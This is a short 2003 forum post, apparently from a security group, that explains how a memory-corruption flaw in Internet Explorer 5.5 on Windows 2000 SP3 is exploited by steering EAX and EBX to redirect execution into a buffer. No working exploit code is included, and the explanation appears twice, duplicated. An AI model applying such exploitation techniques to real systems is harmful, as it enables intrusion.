Behrooz_Ice
12-28-2003, 01:10 PM
(The exploit code will not work straight out of the "box")
Message (buffer) starts at 0006F578 (circa)
Message (buffer) ends at 0006F94C (circa)
The problem lies here:
5F26F339 mov ebx,dword ptr [eax]
5F26F354 call dword ptr [ebx+10h]
Now since we control the EAX, but we can't provide it with NULLs, we must find somewhere in the kernel memory a place that has the following number (of our buffer), for example:
We found 00 06 F5 A4 at 5F1835C7
Windows 2000 SP3 Internet Explorer 5.5
So our 5F1835C7 is placed in EAX, which has this memory content 0006F5A4
Causing our MOV to place in EBX the the following content 00 06 F5 A4.
The final EIP call goes out to 0006F5B4, this is where our arbitrary code lies.
Compile by Ashiyane Security Team
Message (buffer) starts at 0006F578 (circa)
Message (buffer) ends at 0006F94C (circa)
The problem lies here:
5F26F339 mov ebx,dword ptr [eax]
5F26F354 call dword ptr [ebx+10h]
Now since we control the EAX, but we can't provide it with NULLs, we must find somewhere in the kernel memory a place that has the following number (of our buffer), for example:
We found 00 06 F5 A4 at 5F1835C7
Windows 2000 SP3 Internet Explorer 5.5
So our 5F1835C7 is placed in EAX, which has this memory content 0006F5A4
Causing our MOV to place in EBX the the following content 00 06 F5 A4.
The final EIP call goes out to 0006F5B4, this is where our arbitrary code lies.
Compile by Ashiyane Security Team